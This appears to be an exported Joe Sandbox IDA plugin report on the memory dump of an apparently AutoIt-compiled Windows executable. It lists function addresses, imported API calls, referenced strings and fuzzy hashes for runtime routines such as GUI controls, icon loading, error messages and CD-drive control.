Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: ad88ba1ae982c1bec0d86f790a5eeadff4b00e43226baae73bb13d553fe0d309
Instruction ID: 1c33cd60f22ba30aa60f3521fad60ff6eec477bd1efc1df13bb76a1a1fb9e97d
Opcode Fuzzy Hash: ad88ba1ae982c1bec0d86f790a5eeadff4b00e43226baae73bb13d553fe0d309
Instruction Fuzzy Hash: 81616C71108384AFC711DF64D8C5EAFBBF8EF98710F00092EF591961A1DB709A4ADB62

Function 00CE4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00CE4424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CE446F

Strings

COLLAPSE, xrefs: 00CE44B5
SELECT, xrefs: 00CE4620
GETSELECTED, xrefs: 00CE457F
ISCHECKED, xrefs: 00CE45F2
GETTEXT, xrefs: 00CE45C2
GETITEMCOUNT, xrefs: 00CE4551
GETTOTALCOUNT, xrefs: 00CE4456
CHECK, xrefs: 00CE448F
EXISTS, xrefs: 00CE44D8
UNCHECK, xrefs: 00CE464B
EXPAND, xrefs: 00CE4521

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 260cf70a0b4d1edb5a13753ea87afcdfa809dea778a0ce7dc1e0ebf32b56596f
Instruction ID: c768a9064c29ee2085a48398bee432e80ff1d9fe96d494bfb8bafb2838bce23d
Opcode Fuzzy Hash: 260cf70a0b4d1edb5a13753ea87afcdfa809dea778a0ce7dc1e0ebf32b56596f
Instruction Fuzzy Hash: BB91A2742043419FCB18EF11C491AAEB7E5EF95354F14486CF8A65B3A2CB30ED4AEB91

Function 00CEB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CEB8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00CE6B11,?), ref: 00CEB910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CEB949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CEB98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CEB9C3
FreeLibrary.KERNEL32(?), ref: 00CEB9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CEB9DF
DestroyIcon.USER32(?), ref: 00CEB9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CEBA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CEBA17

Part of subcall function 00C82EFD: __wcsicmp_l.LIBCMT ref: 00C82F86

Strings

.exe, xrefs: 00CEB84A
.icl, xrefs: 00CEB82A
.dll, xrefs: 00CEB86D

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 7c0540bf05ae4cb06c49b517245f1ef9c260aa48b478b16641b343af89ee2655
Instruction ID: d4e91b5861cff5ae2d149a9641140f471fafb001d32f554eda71447eca9b6d6c
Opcode Fuzzy Hash: 7c0540bf05ae4cb06c49b517245f1ef9c260aa48b478b16641b343af89ee2655
Instruction Fuzzy Hash: CB61DC71900259BAEB24DF65CC85BBF7BBCEB08711F104119FA25DA1C1DB74AE81DBA0

Function 00CCDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00CCDCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 00CCDCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CCDCF8
__wsplitpath.LIBCMT ref: 00CCDD56
_wcscat.LIBCMT ref: 00CCDD6E
_wcscat.LIBCMT ref: 00CCDD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CCDD95
SetCurrentDirectoryW.KERNEL32(?), ref: 00CCDDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 00CCDDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 00CCDDFC
_wcscpy.LIBCMT ref: 00CCDE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CCDE47

Strings

*.*, xrefs: 00CCDE02

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: daccf18353bba435393b5223441dd579d333ef7204505bf3804aab19e957ff97
Instruction ID: ae8215115a1cfc6de8c85a70d8a21b387a96279219af735ca425dbd41441bd38
Opcode Fuzzy Hash: daccf18353bba435393b5223441dd579d333ef7204505bf3804aab19e957ff97
Instruction Fuzzy Hash: C0613E725042459FCB20EF60C885EAEB3E8FF89314F04492EF99A97251DB31EA45CB52

Function 00CC9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00CC9C7F

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00CC9CA0
__swprintf.LIBCMT ref: 00CC9CF9
__swprintf.LIBCMT ref: 00CC9D12
_wprintf.LIBCMT ref: 00CC9DB9
_wprintf.LIBCMT ref: 00CC9DD7

Strings

"%s" (%d) : ==> %s:, xrefs: 00CC9DD2
"%s" (%d) : ==> %s:%s%s, xrefs: 00CC9DB4
Line %d (File "%s"):, xrefs: 00CC9CF3, 00CC9D0C
Error: , xrefs: 00CC9D81
Incorrect parameters to object property !, xrefs: 00CC9D5B
^ ERROR , xrefs: 00CC9D4E

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 433e5bb7c665cd94f972e49c51777a752f4b3f983dd0167efaa7df4b137641ac
Instruction ID: 0f551e65269c1a392ecc6ba6dddc218d4937626328abf9ad8deb80191628de5e
Opcode Fuzzy Hash: 433e5bb7c665cd94f972e49c51777a752f4b3f983dd0167efaa7df4b137641ac
Instruction Fuzzy Hash: 12516131900609BACF24EBE0DD86EEEB778EF14304F500569F506721A1EB312F5AEB65

Function 00CCA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC

CharLowerBuffW.USER32(?,?), ref: 00CCA3CB
GetDriveTypeW.KERNEL32 ref: 00CCA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CCA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CCA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CCA4C5

Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06

Strings

open , xrefs: 00CCA427
type cdaudio alias cd wait, xrefs: 00CCA443
wait, xrefs: 00CCA482
close cd wait, xrefs: 00CCA4B0
set cd door , xrefs: 00CCA466
closed, xrefs: 00CCA3DF, 00CCA3E8
close, xrefs: 00CCA3D1
open, xrefs: 00CCA3F2

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 1e8c1f5d5ebf8b2502e4b7470bf20f630c34f72df6b6342faddc4912a5a74192
Instruction ID: 841a23e83d4fdf4bffb4e3dcf3463beaf98b8157b1378a984111c80f8b2352ff
Opcode Fuzzy Hash: 1e8c1f5d5ebf8b2502e4b7470bf20f630c34f72df6b6342faddc4912a5a74192
Instruction Fuzzy Hash: 74515C71104305AFC714EF20C8D5D6AB3E8EF98758F10896DF896572A1DB31EE0ADB92

Function 00CBF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00C9E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00CBF8DF
LoadStringW.USER32(00000000,?,00C9E029,00000001), ref: 00CBF8E8

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

GetModuleHandleW.KERNEL32(00000000,00D25310,?,00000FFF,?,?,00C9E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00CBF90A
LoadStringW.USER32(00000000,?,00C9E029,00000001), ref: 00CBF90D
__swprintf.LIBCMT ref: 00CBF95D
__swprintf.LIBCMT ref: 00CBF96E
_wprintf.LIBCMT ref: 00CBFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CBFA2E

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00CBFA12
Line %d (File "%s"):, xrefs: 00CBF957
Error: , xrefs: 00CBF9E5
^ ERROR, xrefs: 00CBF9C3
Line %d:, xrefs: 00CBF968

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 8a87f7532725b3fa396989f12e4f9325cdc2bdb15e04306ab5f67acd53c621da
Instruction ID: c725638bb61ae6acdef9cc1ccd2c8ae63bf29f612a19fc7f561cf66d60f3f663
Opcode Fuzzy Hash: 8a87f7532725b3fa396989f12e4f9325cdc2bdb15e04306ab5f67acd53c621da
Instruction Fuzzy Hash: 54411E7280420DBACF15FBE0DD86EEE7778AF14304F500569F505B6191EA316F4AEB61

Function 00C9A8CB Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 00C9A92B
___wtomb_environ.LIBCMT ref: 00C9A94D

Part of subcall function 00C88B28: __getptd_noexit.LIBCMT ref: 00C88B28

__malloc_crt.LIBCMT ref: 00C9A975
__malloc_crt.LIBCMT ref: 00C9A992
_free.LIBCMT ref: 00C9A9C9
__recalloc_crt.LIBCMT ref: 00C9AA02
__recalloc_crt.LIBCMT ref: 00C9AA47
_strlen.LIBCMT ref: 00C9AA73
__calloc_crt.LIBCMT ref: 00C9AA7D
_strlen.LIBCMT ref: 00C9AA8C
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00C9AABA
_free.LIBCMT ref: 00C9AAD4
_free.LIBCMT ref: 00C9AAE1
_free.LIBCMT ref: 00C9AAF3
__invoke_watson.LIBCMT ref: 00C9AB0D

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 295a1ce99daf9d68c8eeaddf947b2ad713981ba212521aa0efaa1e69e45bc4fa
Instruction ID: 19a66b1d0fccd9463d66c105c49e6d69c648ee635ad4335811bdce260c3245b3
Opcode Fuzzy Hash: 295a1ce99daf9d68c8eeaddf947b2ad713981ba212521aa0efaa1e69e45bc4fa
Instruction Fuzzy Hash: D761F372900302AFDF21AF64DD0A76977A4FF10725F224119E811E72D1EB38DA45DBE6

Function 00CEBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00CEBA56
GetFileSize.KERNEL32(00000000,00000000), ref: 00CEBA6D
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00CEBA78
CloseHandle.KERNEL32(00000000), ref: 00CEBA85
GlobalLock.KERNEL32(00000000), ref: 00CEBA8E
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00CEBA9D
GlobalUnlock.KERNEL32(00000000), ref: 00CEBAA6
CloseHandle.KERNEL32(00000000), ref: 00CEBAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00CEBABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00CF2CAC,?), ref: 00CEBAD7
GlobalFree.KERNEL32(00000000), ref: 00CEBAE7
GetObjectW.GDI32(?,00000018,000000FF), ref: 00CEBB0B
CopyImage.USER32(?,00000000,?,?,00002000), ref: 00CEBB36
DeleteObject.GDI32(00000000), ref: 00CEBB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CEBB74

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: c4e5a902d6304989630962c1c2cee6ec72b3fdb3367186dee03c8d5e5c0bfe53
Instruction ID: eb31bb13f07901dd0c4347baf1a0bf0414badf93d7019d0bae5687ca6c01bb9c
Opcode Fuzzy Hash: c4e5a902d6304989630962c1c2cee6ec72b3fdb3367186dee03c8d5e5c0bfe53
Instruction Fuzzy Hash: 80410875600249EFDB119F66DC88FAFBBB9EB89711F108068F915DB260D7709E02DB60

Function 00CCD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00CCDA10
_wcscat.LIBCMT ref: 00CCDA28
_wcscat.LIBCMT ref: 00CCDA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CCDA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00CCDA63
GetFileAttributesW.KERNEL32(?), ref: 00CCDA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00CCDA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00CCDAA7

Strings

*.*, xrefs: 00CCDAE6

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 442af5944e20122cfee247955dc76311af054e9979973b30457a78bd8c61b7f7
Instruction ID: abb869567d4e267c64138357d14a8830cad9b341a9cd892564b85c04397d19f3
Opcode Fuzzy Hash: 442af5944e20122cfee247955dc76311af054e9979973b30457a78bd8c61b7f7
Instruction Fuzzy Hash: 1F8161755043419FCB24EF65C884F6AB7E8AF89314F14483EF89ACB251EB30DA45DB52

Function 00CEC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CEC1FC
GetFocus.USER32 ref: 00CEC20C
GetDlgCtrlID.USER32(00000000), ref: 00CEC217
_memset.LIBCMT ref: 00CEC342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CEC36D
GetMenuItemCount.USER32(?), ref: 00CEC38D
GetMenuItemID.USER32(?,00000000), ref: 00CEC3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CEC3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CEC41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CEC454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00CEC489

Strings

0, xrefs: 00CEC33A

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 0b1477d08333df2f10feda696798f38ed036f500d8194f1be087f2ce7007eff2
Instruction ID: af299d09d1b87e32302cf69aa80bf018048cf157ad774287c06d7f594a6e958f
Opcode Fuzzy Hash: 0b1477d08333df2f10feda696798f38ed036f500d8194f1be087f2ce7007eff2
Instruction Fuzzy Hash: 3D8191711083919FDB10DF15D8D4A7BBBE8FB88714F00492EF9A5972A1C770D906DB62

Function 00CD731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00CD738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CD739B
CreateCompatibleDC.GDI32(?), ref: 00CD73A7
SelectObject.GDI32(00000000,?), ref: 00CD73B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CD7408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00CD7444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CD7468
SelectObject.GDI32(00000006,?), ref: 00CD7470
DeleteObject.GDI32(?), ref: 00CD7479
DeleteDC.GDI32(00000006), ref: 00CD7480
ReleaseDC.USER32(00000000,?), ref: 00CD748B

Strings

(, xrefs: 00CD7410

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: ba65d11722a5c4aa13b1b8275710d4f6dd13c4d850adedba66e706357dffae0c
Instruction ID: b98c132b892d3987a174541917229a16c8a74303057bd6263bdb0d9839818f01
Opcode Fuzzy Hash: ba65d11722a5c4aa13b1b8275710d4f6dd13c4d850adedba66e706357dffae0c
Instruction Fuzzy Hash: DE515875904249EFCB14CFA8CC85FAEBBB9EF48310F14852EFA5997320D731A9418B50

Function 00C66A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00C80957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C66B0C,?,00008000), ref: 00C80973

Part of subcall function 00C64750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C64743,?,?,00C637AE,?), ref: 00C64770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C66BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00C66CFA

Part of subcall function 00C6586D: _wcscpy.LIBCMT ref: 00C658A5

Part of subcall function 00C8363D: _iswctype.LIBCMT ref: 00C83645

Strings

Bad directive syntax error, xrefs: 00C9E79D
EA06, xrefs: 00C9E452
Unterminated string, xrefs: 00C9E7E4
>>>AUTOIT SCRIPT<<<, xrefs: 00C9E496
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00C9E421
Error opening the file, xrefs: 00C9E43D, 00C9E4B8
AU3!, xrefs: 00C66B61

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 2175a03960f2dc6a8c27bee60bb3ee50e1b947719f75ffe92da4dddf4056e745
Instruction ID: ff3b9a969c3168bbb63098a1dd2ec2cee8b94cf3caf5f9daf5052da15981630f
Opcode Fuzzy Hash: 2175a03960f2dc6a8c27bee60bb3ee50e1b947719f75ffe92da4dddf4056e745
Instruction Fuzzy Hash: F2029D301083419FCB24EF24C891AAFBBE5FF99314F14491DF496972A2DB31DA49EB52

Function 00CC2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00CC2DDD
GetMenuItemCount.USER32(00D25890), ref: 00CC2E66
DeleteMenu.USER32(00D25890,00000005,00000000,000000F5,?,?), ref: 00CC2EF6
DeleteMenu.USER32(00D25890,00000004,00000000), ref: 00CC2EFE
DeleteMenu.USER32(00D25890,00000006,00000000), ref: 00CC2F06
DeleteMenu.USER32(00D25890,00000003,00000000), ref: 00CC2F0E
GetMenuItemCount.USER32(00D25890), ref: 00CC2F16
SetMenuItemInfoW.USER32(00D25890,00000004,00000000,00000030), ref: 00CC2F4C
GetCursorPos.USER32(?), ref: 00CC2F56
SetForegroundWindow.USER32(00000000), ref: 00CC2F5F
TrackPopupMenuEx.USER32(00D25890,00000000,?,00000000,00000000,00000000), ref: 00CC2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00CC2F7E

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

